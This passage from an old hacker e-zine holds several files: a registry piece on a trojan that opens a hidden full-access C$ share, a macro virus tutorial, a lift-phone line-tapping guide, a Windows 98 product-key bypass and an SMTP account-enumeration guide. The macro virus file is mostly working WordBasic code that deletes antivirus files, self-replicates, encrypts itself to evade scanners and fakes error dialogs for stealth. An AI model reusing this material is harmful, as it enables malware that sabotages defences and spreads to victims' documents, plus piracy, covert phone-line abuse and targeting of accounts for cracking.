required you to place a shortcut in the Startup folder or a line in win.ini. You can create the lame trojan effect with a Registry key that uses the DOS prompt as the client for controlling the target computer. This works by connecting to shares. Shares are what Windows uses to share resources from computer to computer. The NetNinja Setup trojan creates the C$ admin share in: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C$ This will assign the remote shared drive to the next available letter on the user's machine and grants full read/write access. When run, the Setup trojan creates a hidden share of drive C: and it places four entries in that key as follows: "Flags"=dword:00000302 "Path"="C:\\" "Remark"="" "Type"=dword:00000000 Two things cause the share to be invisible. The "$" at the end of the name hides any share from the NET VIEW command and to Net Watcher's shared folder listing. The Setup Trojan can be downloaded from: http://www.netninja.com/files/SetupTrojan.zip <*> Registry Programming Now, before I start I must say that there really is no such thing as Registry programming as such. Registry information is not like a programming language, you're not really supposed to make reg keys. Although it is viable to reprogram your registry with programs through various programming languages that is entirely different. What I'm talking about is generally called Registry editing. Similar to patching hex or binary because if you move one space or character out of place then the executable will dysfunction, no questions asked. It is important to understand this. However editing your Registry is easier because it's values are often represented by real words and the more you look at and change keys, the more you will recognise things that repeat. Of course, the reason that reg keys don't equate to a programming language is because there is only similarities, never defined code. They use all sorts of values as well such as binary, hex, hexadecimal etc. Open up all reg keys in Wordpad and save new ones in Wordpad. It is important you use Wordpad and not any other text editor. Below is a reg key which opens up all files with an unrecognised file extension with DOS Edit. Instead of opening the Open With dialog box you will be brought straight into DOS Edit to view the files. This is handy for viewing files made in Unix with no extensions. Note the Registry definition "ASCII Viewable Document" which means a text file "Content Type"="text/plain". Of course if you have ever fooled around with DOS Edit before you will notice it doesn't support executables. This means if you use it to open a .exe file it will represent it in text as best as is possible. This key also ties defines .nfo and .diz as plain text file types. This is handy because although they are famous file extensions they were not created with any text editor in mind so this reg key tells the system they are text files without having to reformat them with a fixed text editor. ----- begin dosedit.reg ----- REGEDIT4 [HKEY_CLASSES_ROOT\asciifile] @="ASCII Viewable Document" "EditFlags"=hex:00,00,01,00 [HKEY_CLASSES_ROOT\asciifile\Shell] @="" [HKEY_CLASSES_ROOT\asciifile\Shell\open] [HKEY_CLASSES_ROOT\asciifile\Shell\open\command] @="edit.com %1" [HKEY_CLASSES_ROOT\asciifile\DefaultIcon] @="C:\\WINDOWS\\SYSTEM\\shell32.dll,64" [HKEY_CLASSES_ROOT\.diz] @="asciifile" "Content Type"="text/plain" [HKEY_CLASSES_ROOT\.nfo] @="asciifile" "Content Type"="text/plain" ----- end dosedit.reg ----- <*> Extracting Registry Data Now we will take a look at some Registry data. Here is an example of a perl script taken from 'Learning Perl on Win32 Systems'. ----- begin reg.pl ----- #! c:\perl\bin\perl.exeuse Win32::Registry; $p = "SOFTWARE\\Microsoft\\Windows \\CurrentVersion"; $main::HKEY_LOCAL_MACHINE->Open($p, $CurrVer) || die "Open: $!\n"; $CurrVer->GetValues(\%vals); foreach $k (keys %vals) { $key = $vals{$k}; print "$$key[0] = $$key[2]\n"; } ----- end reg.pl ----- <*> Hkey_Local_Machine Subkey Functions As anyone who is experienced in using the Registry will tell you, the Hkey_Local_Machine directory is the key to controlling your Windows box. Here is a brief rundown of its standard Subkeys. --> /Config [ A collection of configurations for the local ] [ computer. ] --> /Enum [ Info on the system's installed hardware devices. ] --> /Hardware [ Info on the ports and modems used with ] [ hyperterminal. ] --> /Network [ Info created when a user logs on to a networked ] [ computer. ] --> /Security [ Info on network security and remote ] [ administration. ] --> /Software [ Info about software and it's configuration on ] [ the system. ] --> /System [ The database that controls system start-up, ] [ device driver loading, Windows 95 services, and ] [ O/S behaviour. ] <*> Signing Off _________ ___ ____ ____ ____ ______ / ____/\ \/ // __ ) / __ \ / __ ) / ____/ / / \ // __ |/ / / |/ __ |/ / __ / /___ \ // /_/ // /_/ // / / // /_/ / \____/ /_//_____/ \____//_/ /_/ \____/ cyborg@disinfo.net http://cyborg.ie.8m.com "its not stolen, it fell off the back of a truck" [mousey] [franco] [hitman] [simo] [r0b] [cheesy] [gpf#2] [crypt0genic] [demonr] [alan509] [darkflame] [crossfire] [zirqaz] [force] [zomba] [axcess] [firestarter] [freeman] [ego] [sunburst] [bluecat] [lordphaxx] [hellbent] [tefx] [g_h] [rekcah] [neonbunny] [n1s] [h2so4] [npn] [call] [tds] [swat] [darkcyde] [scorpion] [#hackers_ireland] [#hackerzlair] :..::..End Of File..::..: :..::..File 9 Of 14.::..: :...Making Macro Virii..: :.::.:.:.By Tefx.:.:.::.: <*> tefx@hotmail.com http://www.infowar.co.uk/ampersand Making Macro Virii - Another FAQ [9] - Retro Commands [10] - Anti Heuristic (Encryption) [11] - Stealth (ToolsMacro And File Save) [12] - Multi Lingual [13] - Polymorphism [14] - Advanced and Wierd Techniques Firstly there are a few things you should know: 1. I am not teaching Word Basic ! I am showing you macro virii techniques. 2. I assume you know Basic/WordBasic or are able to comprehend it. 3. I personally assume no responsibility for incidents relating indirectly/directly to this article. 4. Most of the techniques shown will be picked up by Av scanners, so you will have to use farily complicated techniques to avoid detection. (Anti Heuristic) Warning ! Backup all found copies of "NORMAL.DOT" - I mean it! Believe me. YOU WON'T REGRET IT ! If you don't yet have an understanding of Basic do so. I will be using WordBasic (6.0) Not VBA ('97) as I understand it, and it's easier to make. So if you have 97 look up "equivilant commands" in the VBA help file. [9] - Retro Commands Retro is where the Virus takes revenge against the scanner, deleting it ! I was going to show you some of the many retro virii but i only needed to show you one "AntiAVs" : Ingenious. I have only shown the retro commands. > Sub MAIN > t1$ = "Found virus " > t2$ = " and has been clean." > t3$ = "AntiAVs" > DisableInput 1 > On Error Resume Next > AV1$ = Files$("C:\PC-Cillin 95\Scan32.dll") > If AV1$ = "" Then Goto AV2 > SetAttr "c:\autoexec.bat", 0 > Open "c:\autoexec.bat" For Append As #1 > Print #1, "@echo off" > Print #1, "attrib -h -r -s +a c:\pc-cil~1\*.* >nul" > Print #1, "del c:\pc-cil~1\*.dll >nul" > Close #1 > Kill "C:\PC-Cillin 95\Lpt$vpn.*" > 'MsgBox t1$ + "PC-CILLIN 95" + t2$, t3$, 48 > > AV2: > AV2$ = Files$("C:\PC-Cillin 97\Scan32.dll") > If AV2$ = "" Then Goto AV3 > SetAttr "c:\autoexec.bat", 0 > Open "c:\autoexec.bat" For Append As #1 > Print #1, "@echo off" > Print #1, "attrib -h -r -s +a c:\pc-cil~1\*.* >nul" > Print #1, "del c:\pc-cil~1\*.dll >nul" > Close #1 > Kill "C:\PC-Cillin 97\Lpt$vpn.*" > 'MsgBox t1$ + "PC-CILLIN II" + t2$, t3$, 48 > > AV3: > AV3$ = Files$("C:\Tsc\PC-Cillin 97\Scan32.dll") > If AV3$ = "" Then Goto AV4 > SetAttr "c:\autoexec.bat", 0 > Open "c:\autoexec.bat" For Append As #1 > Print #1, "@echo off" > Print #1, "attrib -h -r -s +a c:\tsc\pc-cil~1\*.* >nul" > Print #1, "del c:\tsc\pc-cil~1\*.dll >nul" > Close #1 > Kill "C:\Tsc\PC-Cillin 97\Lpt$vpn.*" > 'MsgBox t1$ + "PC-CILLIN II" + t2$, t3$, 48 > > AV4: > AV4$ = Files$("C:\Zlockav\Gsav.dat") > If AV4$ = "" Then Goto AV5 > Kill AV4$ > Kill "C:\Zlockav\Gsav.cas" > 'MsgBox t1$ + "Zlock" + t2$, t3$, 48 > > AV5: > AV5$ = Files$("C:\VB7\Virus.txt") > If AV5$ = "" Then Goto AV6 > Kill AV5$ > 'MsgBox t1$ + "VB7/VB95" + t2$, t3$, 48 > > AV6: > AV6$ = Files$("C:\Program Files\Norton AntiVirus\Viruscan.dat") > If AV6$ = "" Then Goto AV7 > Kill AV6$ > Kill "C:\Program Files\Symantec\Symevnt.386" > 'MsgBox t1$ + "NAV95" + t2$, t3$, 48 > > AV7: > AV7$ = Files$("C:\Program Files\McAfee\VirusScan95\Scan.dat") > If AV7$ = "" Then Goto AV8 > Kill AV7$ > Kill "C:\Program Files\McAfee\VirusScan95\Mcscan32.dll" > 'MsgBox t1$ + "VirusScan95" + t2$, t3$, 48 > > AV8: > AV8$ = Files$("C:\Program Files\McAfee\VirusScan\Scan.dat") > If AV8$ = "" Then Goto AV9 > Kill AV8$ > Kill "C:\Program Files\McAfee\VirusScan\Mcscan32.dll" > 'MsgBox t1$ + "VirusScan95 3.0" + t2$, t3$, 48 > AV9: > AV9$ = Files$("C:\Program Files\Command Software\F-PROT95\Sign.def") > If AV9$ = "" Then Goto AV10 > Kill AV9$ > Kill "C:\Program Files\Command Software\F-PROT95\Dvp.vxd" > 'MsgBox t1$ + "F-Prot 95" + t2$, t3$, 48 > > AV10: > AV10$ = Files$("C:\Program Files\AntiViral Toolkit Pro\Avp32.exe") > If AV10$ = "" Then Goto AV11 > Kill AV10$ > Kill "C:\Program Files\AntiViral Toolkit Pro\*.avc" > 'MsgBox t1$ + "AVP 95" + t2$, t3$, 48 > AV11: > AV11$ = Files$("C:\TBAVW95\Tbscan.sig") > If AV11$ = "" Then Goto exit > SetAttr "c:\autoexec.bat", 0 > Open "c:\autoexec.bat" For Append As #1 > Print #1, "@echo off" > Print #1, "attrib -h -r -s +a c:\Tbavw95\*.* >nul" > Print #1, "del c:\Tbavw95\Tb*.* >nul" > Close #1 > Kill "C:\Tbavw95\Tbavw95.vxd" > exit: > end sub [10] - Anti Heuristic (Encryption) The idea behind ecryption, I belive was first concieved by NJ, with the killok virus. the prinicpal is simple , and so is the encryption as any ^real^ encryption would take years as wordbasic is so slow ! The reason for encryption (asif it isnt obvious enough) id to combat heuristic scanners, which often just search for MacroCopy in the document Or RndWord in the case of wazzu Encrypting a line is easy, it is just adding 1 (or any number) to the ascii value of the infection code. A simple macro virii (The Q Virus) > On Error Resume Next 'Just Carry on if an error occurs > File$=filename$()+":AutoOpen" 'The Active File > Global$="Global:AutoOpen" ' The Global Template > MacroCopy file$,global$ > FileSaveAs .Format = 1 > MacroCopy Global$,File$ This is incredibly simple as it requries no checking routine: it first tries to copy the macro from the file to the global template, then tries copy the macro from the global template to the active file So it doesnt need to check! But anywhay back to the encryption, if we add 1 to the ascii value of each line we get this result > Po!Fssps!Sftvnf!Ofyu > Gjmf%>gjmfobnf%)*,#;BvupPqfo > Hmpcbm%>#Hmpcbm;BvupPqfo# > NbdspDpqz!gjmf%-hmpcbm%! > GjmfTbwfBt!/Gpsnbu!>!2 > NbdspDpqz!Hmpcbm%-Gjmf% So, the autoOpen macro must decrypt the above code run it then delete it, so we puthe above data into an array to give this lovely piece of code Macro AutoOpen Sub Main Screen Updating 0 DisableInput 1 ' Stop the user intterupting me ScreenUpdating 0 ' Stop the user seeing whats really happening A$(1)="Po!Fssps!Sftvnf!Ofyu" A$(2)="Gjmf%>gjmfobnf%)*,#;BvupPqfo" A$(3)="Hmpcbm%>#Hmpcbm;BvupPqfo#" A$(4)="NbdspDpqz!gjmf%-hmpcbm%!" A$(5)="GjmfTbwfBt!/Gpsnbu!>!2" A$(6)="NbdspDpqz!Hmpcbm%-Gjmf%" ToolsMacro .Name = "Virus", .Show = 1, .Edit ' 'Create a new macro to hold the decrypted code For i = 1 To 6 ' - Loop for every command For x = 1 To Len(A$(i)) 'Loop for each 'Character in the encrypted command b = Asc(Mid$(A$(i), x, 1)) c = b - 1 If c < 0 Then c = c + 255 d$ = d$ + Chr$(c) Next x 'decrypt the macro Insert d$ 'and paste itt into the new file InsertPara'and press enter d$ = "" 'clear the decrypted code to start again Next i 'Onto the next command DocClose 1 'Close the macro Virus 'run the code ToolsMacro .Name = "Virus", .Show = 1, .Delete 'And delete it End Sub This works by Decrypting the macro which in turn copies "AutoOpen" to the global template or the active file, then the AutoOpen macro deletes the encrypted version. To include a payload, either the payload would be added to the encrypted macro or having a separate encrypted macro. Keep in mind this process of encryption. Just as easiy we could insert "+" into the commands to hide it from the Av scanners e.g > A$(1)="O"+"n E"+"rror"+" R"+"esu"+"me Next" > A$(2)="Fil"+"e$"+"=fil"+"ena"+"me$()+"+chr$(34)+":Au"+"toOp"+"en"+chr$(34) > A$(3)="Gl"+"oba"+"l$="+chr$(34)+"Gl"+"oba"+"l:A"+"uto"+"Op"+"en"+chr$(34) > A$(4)="Ma"+"cro"+"Cop"+"y fil"+"e$,g"+"lob"+"al$ " > A$(5)="File"+"Save"+"As"+" ."+"For"+"ma"+"t = 1" > A$(6)="Ma"+"croC"+"op"+"y G"+"loba"+"l$,Fi"+"le$" So withoput the need for encrtpion, an anti heuristic method is achived, this also means that the macros copying routine works faster, and its easier to encode The other proceess is to disguise the caommands by using the \ character like this > FileSaveAs \ > .Format=1 Then putting Comments after it > FileSaveAs \'Hsjhdshd > .Format=1 'hnjdshjd [11] - Stealth (ToolsMacro And File Save) The ToolsMacro Problem is that if you try and run it it will either show you the virus or have a lame Memory error + Removal Method > ToolsCustomizeMenus .Name = "ToolsMacro", .Menu = "Tools", .Remove Remove ToolsMacro From the menu + Lammme Method 1 When the user tries to run Tools macro nothing happens > Sub Main > End sub + Lammme Method 2 When the user tries to run Tools macro a lame memory method runs happens > Sub Main > MsgBox" WordBasic Memory error -7" > End sub + Primitive Tools Macro Routine This just shows up a fake box with an error message when you try to do things. > Sub main' ToolsMacro > Dim ComboBox1$(0) > ComboBox1$(0) = "" > Dim ListBox1$(0) > ListBox1$(0) = "" > Dim DropListBox2$(0) > DropListBox2$(0) = "Normal.dot" > DisableAutoMacros 0 > Begin Dialog UserDialog 442, 320, "Macro" > PushButton 290, 14, 141, 21, "Rec&ord...", .Definierbar2 > CancelButton 290, 43, 141, 21 > PushButton 290, 72, 141, 21, "&Run", .Definierbar3 > PushButton 290, 102, 141, 21, "&Edit", .Definierbar4 > PushButton 290, 130, 141, 21, "&Delete", .Definierbar5 > PushButton 290, 166, 141, 21, "Or&ganizer...", .Definierbar6 > ComboBox 7, 23, 269, 194, ComboBox1$(), .ComboBox1 > Text 6, 223, 93, 13, "Macros &Available In:", .Text1 > Text 7, 259, 109, 13, "Descr&iption:", .Text2 > Text 7, 6, 93, 13, "Macros:", .Text3 > ListBox 7, 276, 425, 38, ListBox1$(), .ListBox1 > DropListBox 6, 238, 425, 19, DropListBox2$(), .ListBox2 > End Dialog > Redim dlg As UserDialog > If Dialog(dlg) = 0 Then > Cancel > Else > MsgBox "Not enough memory", "WordBasic Err = 7" > End If > End Sub + The FileSaveAs Problem The problem is that once the file is a template word acts like an absolute bugger :- check this yourself try FileSaveAs With a template Its a git The Solution is to create a new file using the infected document(template) and then infecting it. complex :-X (Ie we make a new non template clean copy and then do the dirty work) I learned his method from "Jackie Querty [29A]" and stole the code from his phile > Sub FileSaveAs ' Our "FileSaveAs" macro > On Error Goto endFileSaveAs ' > Dim dlg As FileSaveAs ' Declare dlg as FileSaveAs dialog box > GetCurValues dlg ' Get current values into dlg > If dlg.Format <> 1 Then ' Not a template? (i.e. not infected?) > Dialog dlg ' No, a clean document, show box > FileSaveAs dlg ' Save the new document > Infect(dlg.Name) ' Infect it! go! > Else ' It's a template (i.e. it's infected) > TempWindow = Window() ' Get current window (template) > OriginalName$ = dlg.Name ' Get original document name > FileNew .Template = FileName$() ' Create new doc based on template! > On Error Goto CloseDoc ' Now on: if any error close new doc > GetCurValues dlg ' Get current values for new doc > dlg.Name = OriginalName$ ' Change doc name for original one > Dialog dlg ' Ok, show FileSaveAs dialog box > FileSaveAs dlg ' Save the new document > On Error Goto endFileSaveAs ' Now on: if any error just go > Infect(dlg.Name) ' Ok, infect new document > If TempWindow >= Window() ' > TempWindow = TempWindow + 1 ' Get old template window number > EndIf ' > WindowList TempWindow ' Make it the active window > CloseDoc: ' > FileClose 2 ' Close it without promptin > End If ' > endFileSaveAs: ' We're done! "SaveAs" problem fixed! > End Sub ' [12] - Multi Lingual Another problem faced by Vx, and we thought MicroShaft was here to help :) Basically the problem is in the Menus, ToolsMacro wont work in the germanversion, as it is called ExtrasMakro (I Think), so Mtcroshaft to the rescue, have provided us with means to solve this problem. + Simple method... When Infecting Normal.dot dont just do > MacroCopy F$,"Global:ToolsMacro" Use this as well > MacroCopy F$,"Global:ExtrasMakro" So you are copying the same macro to the different lingual commands. + Not as simple as before When Writing your macro, write each macro Separately, I.e ToolsMacro and ExtrasMakro, one having german buttons and messages, the other having englissh buttons :) [13] - Polymorphism Traditionally polymorphism was achived by a method of encryption. The encrypted code was dercrypted, then re-encrypted into the new file. Lucity in Macro Virii there are easier options to tread. In reality when using polymorphism through encryption you are showing off, or hiding a well known payload, which could had just as easily been encrypted There is another method which still uses an encrypted macro wich once decrypted, copys the encrypted macro to a temp file, then edits the temp file, and copies it to the final location, and deletes the temp macro. Instead of encryption, there is a method which avoids the use of encryption. In which a separate macro which name is randomised which opens up the non active macros and removes the existing comments (if any) and writes more random comments If you have used the encoding method which uses "+" inserted randomly, It is probably possible to randomize them for instance. AutoOpen Once decrpted this macro copies the other macros (if needed) and randomizes the macros in the global tempolate And the other macros do the same. If you haven't guessed by now, I see polymoprhism as an action that may avoid scanners, but the time taken to write the code, and morph the code, cancels out the usefullness. Stick to the anti heuristic methods. Basically , only for those who want to prove a point ;) [14] - Advanced and Wierd Techniques + dRoKz Another inspiration by NJ :O , As there is an organizer copy function in the language, it can be achived through dialog after dialog. > SendKeys "%tm%g%c{ESC}" %t - Tools m - Macro : Selects ToolsMacro %g : Selects the Organizer %c : Copys the macro :0 {esc} : close all the windows So this uses the organizer, but a different version must exist for different languages :( + The Virtual Boy Method Instead of copying itself too the global template, the virus copies its self to the default directory, as adds itself to the templates list, and so, is a bugger to get rid of, as deleting nomal.dot makes no difference hehehe... But it makes it harder to have Anti Heuristic capabilities :| So here we are..the routine to infect normal.dot > Sub InfectGlobal > 'a$ = Startup Path from WinWord. > a$ = DefaultDir$(8) + "\0.dot" > 'Where we'regoing to store our macros > REM Copy the infected document to this Startup Path. > If Files$(a$) = "" Then > 'If its Not there > ' This is a good way to check if your infecting a document > ' or the global ! > CopyFile FileName$(), a$ > 'Copy it > REM Enable the virus! > AddAddIn a$ > EndIf > End Sub Then if you're wondering if it was worth it then have a look at this perfect stealth in macro virii. > Sub MAIN > REM Get the position of the infected document. > b = GetAddInId(DefaultDir$(8) + "\0.dot") > REM Set ScreenUpdating Off > ScreenUpdating 0 > If DocMaximize() Then > DocMaximize > c = 1 > EndIf > REM Create a new file to hide the virus macros in the active file. > FileNew > REM Remove now the virus document from the ToolsMacro box. > If b Then AddInState 1, 0 > REM ToolsMacro Options > Dim d As ToolsMacro > On Error Resume Next > Dialog d > REM Close the document. > FileClose > REM Enable now again the virus document. > If c Then DocMaximize > If b Then AddInState 1, 1 > REM Show the user the >> clean << Box. ;) > ToolsMacro d > End Sub Trying to replicate this without the special routine is almost impossible heheha :) :..::..End Of File..::..: :..::.File 10 Of 14.::..: :.Elevator Beige Boxing.: :.:..:.By Holyblob.:..:.: Introduction ~~~~~~~~~~~~ Eye eye kids. Welcome to my file on beige boxing in a lift. Yep, believe it or not, you can beige from inside a lift car and I'm gonna tell ya what I know. First Off ~~~~~~~~~ Well first off, your gonna have to find a lift with an emergency phone (you can get the picture already :>). The lifts I recommend are shop lifts that only have a few floors cause they are usually lame enough to have a phone and not an intercom and sometimes, if they're pure stupid, they have a sticker stuck in the phone box telling you to ring security on ext. xxxx or dial 999 in the case of an emergency!! Lifts like these are asking for abuse. You will also find this in office blocks and other large buildings but they are harder to get into and are more likely to be full of pricks in suites. Obviously dinner times are the worst so avoid them like the plague if you're going into larger buildings. Caution: Just a word of warning, the stainless door to the emergency phone sometimes has an auto alarm and can be *real* loud. This only happens about 1% of the time but just be warned. If you're real unlucky you can get a phone door that's linked into the safety circuit as well as alarmed. This means that the lift will suddenly stop and an alarm will sound if you open the phone door. However, this is very rare and I've only come across it once on an old express lift. The lift will run once the phone door is closed over again but the alarm needs resetting up in the motor room SO RUN LIKE FUCK or you will be hammered cause a qualified lift engineer needs to be called to go into the motor room and reset the alarm (pretty pricey). Tricks of the Trade ~~~~~~~~~~~~~~~~~~~ Lifts in shops are mainly for moving stock so they are used pretty often. I find that you are best to keep moving between the ground floor and the top floor but never stopping at the shop floor. If you're in the car, it can still be called to all the floors by people waiting there. This can't really be avoided unless you have a special key. But here's an excuse you can use if your in the lift and it starts to go up to the stock room, or somewhere you're not supposed to be: (The person gives you a funny look or makes a comment) You say: Tut, I pressed both buttons didn't I? I'm just too impatient. (Then laugh lightly) This works wonders cause it means that if someone puts a call in on the floor above and you want to go down put press both landing buttons, you get in and press ground but the lift will collect the person above first cause you pressed both buttons. I hope that made sense :>. But, if you're sat at a floor and someone wants the lift, the doors are gonna open with no warning and you're gonna be stood there with the phone in your hand. Hmmm, nasty. If that happens, just say "Fuck me, I thought I was stuck, I was just about to call for help". And if you're asked what happened, say "The button lit up but went out as I took my finger off". MAKE SURE THAT THE BUTTONS LITUP IN THE FIRST PLACE!!! If you've managed to get into a large building, most lifts are paired. Just hop into one of them and get yourself stuck making sure you can get yourself unstuck. Stay stuck for about 5 or 10 minutes then take the lift for a mooch so it looks like its still working. When you've had your fun, jump out and, go down to ground in the other lift and walk out (a little paranoia never hurt anyone). Remotely does it ~~~~~~~~~~~~~~~~ This is a nice little way to use the line in the lift from outside the building in the comfort of your car or whatever. Just go to a HAM Radio Fair and pick up a cordless phone for about a 10 spot and use terminal block to connect it into the cable. If you want it to last longer than a couple of weeks, get a sheet of stainless and make a false back if the box is big enough. Hide your phone behind the false back and screw the emergency phone to the false back. If you're using an old cordless, to power packs supplies it 8V AC~ but you can power it with the battery backup or a 9V battery where the power pack goes. This just means that you can't charge the handset cause I think it needs an AC current to do this. Your gonna have to cut the charge unit out of the phone anyway so you can charge the handset up or find out the rating of the handset battery and make a transformer for your car. Then get an acoustic coupler and use it for net access :) There's no limit to what you can do except the battery life of the base unit so have fun and play safely kids :) holy ================================================================= | _________ ======================= _________ | | ¬¬¬;¬¬¬;¬ */ __ \ ___ _______ / __ \ | | ¬¬¬¬¬¬¬¬ */ /::\ /*/ / ¬¬ */ \ / /::\ /* ¬ | | ¬;¬¬¬;¬ */ /:::/ /*/ / ¬¬ */ ___ /*/ /:::/ /* ¬¬ | | ¬¬¬¬¬¬ */ /___/ /*/ / ¬¬ */ /::::\ /*/ /___/ /* ¬;¬ | | ¬¬¬;¬ */ __/*/ / ¬¬ */ /:::: / /*/ __/* ¬¬¬¬ | | ¬¬¬¬ */ ___ \ / / ¬¬ */ /:::::/ /*/ ___ \ ¬;¬¬¬ | | ¬;¬ */ /:::\ /*/ / ¬¬ */ /:::::/ /*/ /:::\ /* ¬¬¬¬¬¬ | | ¬¬ */ /::::/ /*/ /_____ */ _____/ /*/ /::::/ /* ¬;¬¬¬;¬ | | ¬ */ /____/ /*/ /*/ /*/ /____/ /* ¬¬¬¬¬¬¬¬ | | */__________/*/________/* _________/*/__________/* ¬;¬¬¬;¬¬¬ | ================================================================= =holyblob@hotmail.com =ICQ 31783228 :..::..End Of File..::..: :..::.File 11 Of 14.::..: :.::.Windows 98 Flaw.::.: :..::.:.By HitMan.:.::..: Introduction: ------------- Want to hear about the flaw I discovered? When I was installing Windows 98 on my computer the other week I noticed a little flaw. So basically here's how it's done. First of all I got the CD off a mate that got it with his brand new computer and a big problem was that the dumbass forgot to bring over the manual containing the 25 digit code that you need to register Windows 98. The guy also lived too far away to go and get it so I had to leave my machine on whilst I awaited a phone call with the code. But after a long time the guy did not call and I was getting very fed up with my machine being on. <*>--------------------------How It's Done--------------------------<*> So I clicked not to accept the license agreement, this then sent me crashing out of the install program and into DOS. It then struck me that it asked me for the 25 digit code after it had copied the files onto my hard disk, meaning that there must be some sort of Win32 file system copied onto my computer. Another thought also struck me, it was the notion that Windows 95 put up the prompt below: ************** Starting Windows 95... ************** When this prompt came up you could hit F8 (or sometimes F5) and it would bring up a boot menu with several options such as: **************************SCREEN************************* * * * Microsoft Windows 95 Startup Menu * * ================================== * * * * 1. Normal * * 2. Logged (\BOOTLOG.TXT) * * 3. Safe mode * * 4. Safe mode with Network support * * 5. Step-by-step confirmation * * 6. Command prompt only * * 7. Safe mode command prompt only * * 8. Previous version of MS-DOS * * * * Enter a choice: ? * * * * * * * * * * * * * * F5=Safe mode Shift+F5=Command prompt * * * **************************SCREEN************************* So I thought just maybe these would be in Windows 98 as well. However there was a technical hitch, Windows 98 did not bring up a "Starting Windows 98..." so it basically meant that I would have to time the pressing of the F8 key with the Starting Windows 98 bitmap screen... and hey presto a boot menu did come up: **************************SCREEN************************* * * * Microsoft Windows 95 Startup Menu * * ================================== * * * * 1. Normal * * 2. Logged (\BOOTLOG.TXT) * * 3. Safe mode * * 4. Safe mode with Network support * * 5. Step-by-step confirmation * * 6. Command prompt only * * 7. Safe mode command prompt only * * 8. Previous version of MS-DOS * * * * Enter a choice: ? * * * * * * * * * * * * * * F5=Safe mode Shift+F5=Command prompt * * * **************************SCREEN************************* (Not really much difference!) It gave me the option I needed Safe Mode eventually I selected this and Windows amazingly went slowly into configuring the system and then onto Safe Mode. <*>----------------------------Next Up------------------------------<*> So what do you do next? I hear you ask. Click Start Menu|Run and type "REGEDIT" to bring up the registry editor and click on Hkey_Local_Machine and then onto: SOFTWARE/MICROSOFT/WINDOWS/CURRENT VERSION Now you will see some files here and there but the ones you need to edit are: ProductID RegisteredOrganization RegisteredOwner **********CAUTION********** This can easily scramble your machine so be careful. *************************** Double click on each one (one at a time) and change the name of the Registered Owner and Organization to whatever you want. This will do nothing if incorrectly done as its only a name. Now for the tricky bit, just simply change the Product ID to any 25 digit code such as: ***************************** 12345-67891-23456-78912-34567 ***************************** You can also use a made-up number but just make sure it has the gaps and is just 25 digits and no more. Now click OK to confirm that this is correct. From here you just simply shutdown Windows the correct way through the Start Menu and reboot. Windows will then go back into the setup program and continue the installation, all that we have done is told the computer that Windows 98 has already been registered so then it will skip the 25 digit code step and continue from the next step that is in line. <*>--------------------------Conclusion-----------------------------<*> So Bill Gates what happened to your big ass business? Could you not just make a good operating system with all of that money that you have, or are you just a miser!! Cause the house that Bill built has crumbled to it's foundation!! This may be useful as I have done it and there is no reason why you shouldn't try it with any other programs or just simply use it with Windows 98. Send this file to your mates as it will come in useful for future reference. (Please note the Windows 9x screens are not set to the same size!) __ __ __ ________ ___ ___ ____ ___ __ | | | | | | |__ __| | \ / | / __ \ | \ | | | |_| | | | | | | \/ | / |__| \ | \ | | | _ | | | | | | |\ /| | / ____ \ | |\ \| | | | | | | | | | | | \/ | | / / \ \ | | \ | |__| |__| |__| |__| |__| |__| /__/ \__\ |__| \___| [-=http://hitman.it.8m.com=-] [-=vectra500@geocities.com=-] :..::..End Of File..::..: :..::.File 12 Of 14.::..: :..SMTP User Verifying..: :..::..By NeonBunny.::..: <*> SMTP User Verifying and Using "User Manager" +--------------------------------------------+ SMTP vrfy --------- SMTP is the service that runs on port 25 of most Internet servers, in normal use it's used for receiving e-mail for people using that server. A nice little feature of most SMTP packages is the VRFY command which some e-mail clients use to check that the user it's sending e-mail to actually exists on that machine and that it won't bounce back as return mail (this is now built into the RCPT command too). The majority of SMTP daemons will allow you to issue the VRFY command without logging onto their mail server (although it can still be logged, it's not as easy to trace you if you don't send your e-mail address as a login). The syntax of the VRFY command goes something like... Telnet mail.suckerz.com 25 >Hello this is suckerz.com lame mail system v58.3 at your command, how >can I help? VRFY test >Yup I've got a user called "Test Icle" and his e-mail is VRFY billg >Nope I've got no one here called billg There are two variations of this that I've come across, the first acts as above and will tell you if there is or isn't a user of that name on the server, this is the typical case of most *nix systems running sendmail. The second variation occurs when the vrfy command has been turned off and here 2 things can happen either it says that it has every user you ask it, if this was the case the mail.suckerz.com would report that it had user test, billg and kjsdhfkj. These can be identified by VRFY-ing a few hits on the keyboard. This happens on NT's IIS machines because but instead of removing the command it just tells you what you want to hear. The other thing you may come across when the VRFY command has been turned off is a message telling you this and asking you to use the RCPT command instead, to do this simply log on with: HELO www.microsoft.com give a fake MAIL FROM: root@hotmail.com and then either try RCPT user or RCPT user@server.com and this will tell you if the user exists although won't tell you their full name as it does with VRFY Some machines require you to log on and can be identified easily as below: Telnet mail.suckerz.com 25 >Hello this is suckerz.com lame mail system v58.3 at your command, how >can I help? VRFY test >Hey log on to me first, I think you should log on with the user name >the.hackerbox.mil So it basically knows roughly who you are anyway, by sending the HELO command this should please the SMTP service enough to let you VRFY or RCPT users. The HELO command should be in the format of... HELO 123.123.123.123 or HELO my.hostname.com If the machine queries the fake response you may as well give it your IP since it's already logged anyway. While this will let you past the nagging "log on" messages chances are you'll just meet a variation 2 service once you've hit a few more keys. User Manager ------------ User Manager simply automates this process by VRFY and RCPT-ing a list of users to give you valid accounts to crack (e.g. stevej) as well as unearthing possible insecure users (e.g. test) or even identifying the machine's O/S (e.g. nobody4). Using the file menu load a user list which will pop-up in the top list box, enter the server in the box under the SMTP category and hit Limit, this will create a copy of the user file called c:\temp.tmp which it uses to work from and is deleted at after each scan. The program will then connect to port 25 of the server and begin VRFY/RCPT-ing users, the good users appear in the good list and the bad users in the bad list (obviously) when the process is finished all of the good users are transferred to the top main user list where typical procedures can be performed e.g. adding users, removing users and saving. There is a user list (created by my fair hands) supplied with the program which has proven to be useful in the past but the program will work with any user list you may already have. Future developments may include the ability to crack users directly from the user list, i.e. a point and click hacker. NeonBunny the_neon_bunny@hotmail.com :..::..End Of File..::..: :..::.File 13 Of 14.::..: :.::.You've Got Mail.::.: :.::.:..By Readers.:.::.: ___________ _____________________________ ", / / ___ |"'-. / / / / _ \ ___ _____ |!!!!', / / / | | \_| / | |_ __| |!!!!!| / / / | | |\ | () | | | |!!!!!/ / / / | |_| | |___/ |/ |!!!!/ / / / \___/ |!!!/ / / / /| /| __ /| ___ |!!/ / / / | \_/ | / '| | | / _ \ |!/ | / / | | | | (| | | |__ | |__/ |/ \ | _.' | |\/| | \___| \___\ \___\ '-._'..-' |/ |/ (!) 